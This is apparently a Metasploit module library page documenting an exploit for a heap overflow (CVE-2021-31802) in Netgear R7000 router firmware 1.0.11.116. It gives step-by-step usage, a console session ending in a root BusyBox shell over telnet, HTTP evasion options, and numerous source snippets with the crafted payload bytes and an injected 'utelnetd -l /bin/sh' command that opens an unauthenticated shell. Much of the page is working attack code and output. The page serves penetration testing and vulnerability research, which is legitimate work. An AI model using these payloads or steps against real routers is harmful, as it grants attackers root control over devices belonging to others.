Netgear R7000 backup.cgi Heap Overflow RCE - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Netgear R7000 backup.cgi Heap Overflow RCE
Module: auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
Source code: modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb
Disclosure date: 2021-04-21
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): armle
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-31802
This module exploits a heap buffer overflow in the genie.cgi?backup.cgi page of Netgear R7000 routers running firmware version 1.0.11.116. Successful exploitation results in unauthenticated attackers gaining code execution as the root user. The exploit utilizes these privileges to enable the telnet server which allows attackers to connect to the target and execute commands as the admin user from within a BusyBox shell. Users can connect to this telnet server by running the command "telnet target IP".
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-service-down: Module may crash the service, and the service remains down.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
msf auxiliary(netgear_r7000_backup_cgi_heap_overflow_rce) > show targets
... a list of targets ...
msf auxiliary(netgear_r7000_backup_cgi_heap_overflow_rce) > set TARGET target-id
msf auxiliary(netgear_r7000_backup_cgi_heap_overflow_rce) > show options
... show and set options ...
msf auxiliary(netgear_r7000_backup_cgi_heap_overflow_rce) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Introduction
This module exploits a heap buffer overflow in the genie.cgi?backup.cgi
page of Netgear R7000 routers running firmware versions 1.0.11.116
and prior.
Successful exploitation results in unauthenticated attackers gaining
code execution as the root
user.
The exploit utilizes these privileges to enable the telnet server
which allows attackers to connect to the target and execute commands
as the admin
user from within a BusyBox shell. Users can connect to
this telnet server by running the command telnet *target IP*
.
Vulnerable Application
Netgear R7000 routers running firmware version 1.0.11.116
and earlier.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
- Do:
set RHOSTS <RouterIP>
- Do:
exploit
- Wait for the message about how to connect to the telnet shell to appear.
- Connect to the telnet shell by executing
telnet <RouterIP>
- Verify that you now have a BusyBox shell running as the
admin
user.
Scenarios
Netgear R7000 with Firmware Version 1.0.11.116
msf6 > use auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show options
Module options (auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
[*] Running module against 192.168.1.1
[*] Executing automatic check (disable AutoCheck to override)
[*] Router is a NETGEAR router (R7000)
[+] The target is vulnerable.
[*] Sending 10th and final packet...
[*] If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet 192.168.1.1
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
And in a separate terminal shell:
~/git/metasploit-framework │ CVE-2021-31802 !1 telnet 192.168.1.1 ✔ │ 2.7.2 Ruby
Trying 192.168.1.1...
telnet: Unable to connect to remote host: Connection refused
~/git/metasploit-framework │ CVE-2021-31802 !2 telnet 192.168.1.1 1 х │ 2.7.2 Ruby
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
BusyBox v1.7.2 (2020-12-21 13:01:11 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux R7000 2.6.36.4brcmarm+ #30 SMP PREEMPT Mon Dec 21 12:35:01 CST 2020 armv7l unknown
# id
uid=0(admin) gid=0(root)
#
Go back to menu.
Msfconsole Usage
Here is how the admin/http/netgear_r7000_backup_cgi_heap_overflow_rce auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show info
Name: Netgear R7000 backup.cgi Heap Overflow RCE
Module: auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-04-21
Provided by:
colorlight2019
SSD Disclosure
Grant Willcox (tekwizz123)
Module side effects:
config-changes
Module stability:
crash-service-down
Module reliability:
repeatable-session
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Description:
This module exploits a heap buffer overflow in the
genie.cgi?backup.cgi page of Netgear R7000 routers running firmware
version 1.0.11.116. Successful exploitation results in
unauthenticated attackers gaining code execution as the root user.
The exploit utilizes these privileges to enable the telnet server
which allows attackers to connect to the target and execute commands
as the admin user from within a BusyBox shell. Users can connect to
this telnet server by running the command "telnet *target IP*".
References:
https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/
https://nvd.nist.gov/vuln/detail/CVE-2021-31802
Module Options
This is a complete list of options available in the admin/http/netgear_r7000_backup_cgi_heap_overflow_rce auxiliary module:
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show options
Module options (auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the admin/http/netgear_r7000_backup_cgi_heap_overflow_rce auxiliary module:
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show advanced
Module advanced options (auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/netgear_r7000_backup_cgi_heap_overflow_rce module can do:
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/netgear_r7000_backup_cgi_heap_overflow_rce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Connection timed out.
- Could not retrieve firmware version!
- Connection timed out.
- Router is not a NETGEAR router
- The target R7000 router responded prematurely on the first packet, something wrong happened!
- The target R7000 router responded prematurely on the second packet, something wrong happened!
- The target R7000 router responded with a non 200 OK response on the third packet!
- The target R7000 router responded with a non 200 OK response on the fourth packet!
- The target R7000 router responded prematurely on the fifth packet, something wrong happened!
- The target R7000 router responded with a non 200 OK response on the sixth packet!
- The target R7000 router responded with a non 200 OK response on the seventh packet!
- The target R7000 router responded with a non 200 OK response on the eighth packet!
- The target R7000 router responded on the ninth packet!
- Sorry but at this point in time only version 1.0.11.116 of the R7000 firmware is exploitable with this module!
- The target R7000 router did not send us the expected 200 OK response after 3 invalid login attempts!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Connection timed out.
Here is a relevant code snippet related to the "Connection timed out." error message:
63: end
64:
65: def retrieve_firmware_version
66: res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
67: if res.nil?
68: return Exploit::CheckCode::Unknown('Connection timed out.')
69: end
70:
71: data = res.to_s
72: firmware_version = data.match(/Firmware=V(\d+\.\d+\.\d+\.\d+)(_(\d+\.\d+\.\d+))?/)
73: if firmware_version.nil?
Could not retrieve firmware version!
Here is a relevant code snippet related to the "Could not retrieve firmware version!" error message:
69: end
70:
71: data = res.to_s
72: firmware_version = data.match(/Firmware=V(\d+\.\d+\.\d+\.\d+)(_(\d+\.\d+\.\d+))?/)
73: if firmware_version.nil?
74: return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
75: end
76:
77: firmware_version
78: end
79:
Connection timed out.
Here is a relevant code snippet related to the "Connection timed out." error message:
89:
90: # Requests the login page which discloses the hardware. If it's an R7000 router, check if the firmware version is vulnerable.
91: def check
92: res = send_request_cgi({ 'uri' => '/' })
93: if res.nil?
94: return Exploit::CheckCode::Unknown('Connection timed out.')
95: end
96:
97: # Checks for the `WWW-Authenticate` header in the response
98: if res.headers['WWW-Authenticate']
99: data = res.to_s
Router is not a NETGEAR router
Here is a relevant code snippet related to the "Router is not a NETGEAR router" error message:
104: if model == 'R7000' && check_vuln_firmware
105: return Exploit::CheckCode::Vulnerable
106: end
107:
108: else
109: print_error('Router is not a NETGEAR router')
110: end
111: return Exploit::CheckCode::Safe
112: end
113:
114: def fake_logins_to_ease_heap
The target R7000 router responded prematurely on the first packet, something wrong happened!
Here is a relevant code snippet related to the "The target R7000 router responded prematurely on the first packet, something wrong happened!" error message:
156: 'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
157: 'data' => send_data
158: })
159:
160: if !res.nil?
161: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded prematurely on the first packet, something wrong happened!')
162: end
163:
164: post_data.parts[0].header.headers[0] = [Rex::Text.rand_text_alpha(19).to_s, "form-data; name=\"mtenRestoreCfg\"; filename=\"#{Rex::Text.rand_text_alpha(439)}\""]
165: send_data = post_data.to_s
166: send_data.sub!(/a\r\n--#{post_data.bound}--\r\n/, Rex::Text.rand_text_alpha(1))
The target R7000 router responded prematurely on the second packet, something wrong happened!
Here is a relevant code snippet related to the "The target R7000 router responded prematurely on the second packet, something wrong happened!" error message:
173: 'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
174: 'data' => send_data
175: })
176:
177: if !res.nil?
178: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded prematurely on the second packet, something wrong happened!')
179: end
180:
181: post_data.parts[0].header.headers[0] = [Rex::Text.rand_text_alpha(19).to_s, "form-data; name=\"mtenRestoreCfg\"; filename=\"#{Rex::Text.rand_text_alpha(447)}\""]
182: post_data.parts[0].content = "#{Rex::Text.rand_text_alpha(24)}\xC0\x03\x00\x00\x28\x00\x00\x00"
183: send_data = post_data.to_s
The target R7000 router responded with a non 200 OK response on the third packet!
Here is a relevant code snippet related to the "The target R7000 router responded with a non 200 OK response on the third packet!" error message:
191: 'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
192: 'data' => send_data
193: })
194:
195: if res.code != 200
196: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded with a non 200 OK response on the third packet!')
197: end
198:
199: post_data.parts[0].header.headers[0] = ['Content-Disposition', "form-data; name=\"StringFilepload\"; filename=\"#{Rex::Text.rand_text_alpha(256)}\""]
200: post_data.parts[0].content = "\xA0\x03\x00\x00#{"\x20" * 12}#{Rex::Text.rand_text_alpha(924)}\x09\x00\x00\x00"
201: send_data = post_data.to_s
The target R7000 router responded with a non 200 OK response on the fourth packet!
Here is a relevant code snippet related to the "The target R7000 router responded with a non 200 OK response on the fourth packet!" error message:
209: 'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
210: 'data' => send_data
211: })
212:
213: if res.code != 200
214: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded with a non 200 OK response on the fourth packet!')
215: end
216:
217: post_data.parts[0].header.headers[0] = [Rex::Text.rand_text_alpha(19).to_s, "form-data; name=\"mtenRestoreCfg\"; filename=\"#{Rex::Text.rand_text_alpha(447)}\""]
218: post_data.parts[0].content = ''
219: send_data = post_data.to_s
The target R7000 router responded prematurely on the fifth packet, something wrong happened!
Here is a relevant code snippet related to the "The target R7000 router responded prematurely on the fifth packet, something wrong happened!" error message:
227: 'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
228: 'data' => send_data
229: })
230:
231: if !res.nil?
232: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded prematurely on the fifth packet, something wrong happened!')
233: end
234:
235: post_data.parts[0].header.headers[0] = ['Content-Disposition', "form-data; name=\"StringFilepload\"; filename=\"#{Rex::Text.rand_text_alpha(256)}\""]
236: post_data.parts[0].content = "\x20\x00\x00\x00#{"\x20" * 12}a"
237: send_data = post_data.to_s
The target R7000 router responded with a non 200 OK response on the sixth packet!
Here is a relevant code snippet related to the "The target R7000 router responded with a non 200 OK response on the sixth packet!" error message:
245: 'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
246: 'data' => send_data
247: })
248:
249: if res.code != 200
250: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded with a non 200 OK response on the sixth packet!')
251: end
252:
253: post_data.parts[0].header.headers[0] = ['Content-Disposition', "form-data; name=\"StringFilepload\"; filename=\"#{Rex::Text.rand_text_alpha(256)}\""]
254: post_data.parts[0].content = "\x48\x00\x00\x00#{"\x20" * 12}a"
255: send_data = post_data.to_s
The target R7000 router responded with a non 200 OK response on the seventh packet!
Here is a relevant code snippet related to the "The target R7000 router responded with a non 200 OK response on the seventh packet!" error message:
263: 'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
264: 'data' => send_data
265: })
266:
267: if res.code != 200
268: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded with a non 200 OK response on the seventh packet!')
269: end
270:
271: post_data.parts[0].header.headers[0] = [Rex::Text.rand_text_alpha(19).to_s, "form-data; name=\"mtenRestoreCfg\"; filename=\"#{Rex::Text.rand_text_alpha(439)}\""]
272: post_data.parts[0].content = "#{Rex::Text.rand_text_alpha(36)}\x51\x00\x00\x00\xd8\x08\x12\x00"
273: send_data = post_data.to_s
The target R7000 router responded with a non 200 OK response on the eighth packet!
Here is a relevant code snippet related to the "The target R7000 router responded with a non 200 OK response on the eighth packet!" error message:
281: 'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
282: 'data' => send_data
283: })
284:
285: if res.code != 200
286: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded with a non 200 OK response on the eighth packet!')
287: end
288:
289: post_data.parts[0].header.headers[0] = [Rex::Text.rand_text_alpha(19).to_s, "form-data; name=\"mtenRestoreCfg\"; filename=\"#{Rex::Text.rand_text_alpha(399)}\""]
290: post_data.parts[0].content = ''
291: send_data = post_data.to_s
The target R7000 router responded on the ninth packet!
Here is a relevant code snippet related to the "The target R7000 router responded on the ninth packet!" error message:
299: 'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
300: 'data' => send_data
301: })
302:
303: if !res.nil?
304: fail_with(Failure::UnexpectedReply, 'The target R7000 router responded on the ninth packet!')
305: end
306:
307: post_data.parts[0].header.headers[0] = ['Content-Disposition', "form-data; name=\"StringFilepload\"; filename=\"#{Rex::Text.rand_text_alpha(256)}\""]
308: post_data.parts[0].content = "\x48\x00\x00\x00#{"\x20" * 12}utelnetd -l /bin/sh#{"\x00" * 45}\x04\xe8\x00\x00"
309: send_data = post_data.to_s
Sorry but at this point in time only version 1.0.11.116 of the R7000 firmware is exploitable with this module!
Here is a relevant code snippet related to the "Sorry but at this point in time only version 1.0.11.116 of the R7000 firmware is exploitable with this module!" error message:
326: def run
327: firmware_version = retrieve_firmware_version
328:
329: firmware_version = Rex::Version.new(firmware_version[1])
330: if firmware_version != Rex::Version.new('1.0.11.116')
331: fail_with(Failure::NoTarget, 'Sorry but at this point in time only version 1.0.11.116 of the R7000 firmware is exploitable with this module!')
332: end
333:
334: unless fake_logins_to_ease_heap # Set the heap to a more predictable state via a series of fake logins.
335: fail_with(Failure::UnexpectedReply, 'The target R7000 router did not send us the expected 200 OK response after 3 invalid login attempts!')
336: end
The target R7000 router did not send us the expected 200 OK response after 3 invalid login attempts!
Here is a relevant code snippet related to the "The target R7000 router did not send us the expected 200 OK response after 3 invalid login attempts!" error message:
330: if firmware_version != Rex::Version.new('1.0.11.116')
331: fail_with(Failure::NoTarget, 'Sorry but at this point in time only version 1.0.11.116 of the R7000 firmware is exploitable with this module!')
332: end
333:
334: unless fake_logins_to_ease_heap # Set the heap to a more predictable state via a series of fake logins.
335: fail_with(Failure::UnexpectedReply, 'The target R7000 router did not send us the expected 200 OK response after 3 invalid login attempts!')
336: end
337:
338: send_payload
339: end
340: end
Go back to menu.
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_file
method - #15540 Merged Pull Request: Add option for running
cmd_execute
in a subshell - #15303 Merged Pull Request: Fix
dir
method for windows shell sessions - #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/netgear_auth_download
- auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
- auxiliary/admin/http/netgear_r6700_pass_reset
- auxiliary/admin/http/netgear_soap_password_extractor
- auxiliary/admin/http/netgear_wnr2000_pass_recovery
- auxiliary/gather/netgear_password_disclosure
- auxiliary/scanner/http/netgear_sph200d_traversal
- exploit/linux/http/netgear_dgn1000b_setup_exec
- exploit/linux/http/netgear_dgn1000_setup_unauth_exec
- exploit/linux/http/netgear_dgn2200b_pppoe_exec
- exploit/linux/http/netgear_dnslookup_cmd_exec
- exploit/linux/http/netgear_r7000_cgibin_exec
- exploit/linux/http/netgear_readynas_exec
- exploit/linux/http/netgear_unauth_exec
- exploit/linux/http/netgear_wnr2000_rce
- exploit/linux/telnet/netgear_telnetenable
- exploit/windows/http/netgear_nms_rce
- auxiliary/admin/android/google_play_store_uxss_xframe_rce
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/http/iomega_storcenterpro_sessionid
- auxiliary/admin/backupexec/dump
- auxiliary/admin/backupexec/registry
Authors
- colorlight2019
- SSD Disclosure
- Grant Willcox (tekwizz123)
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.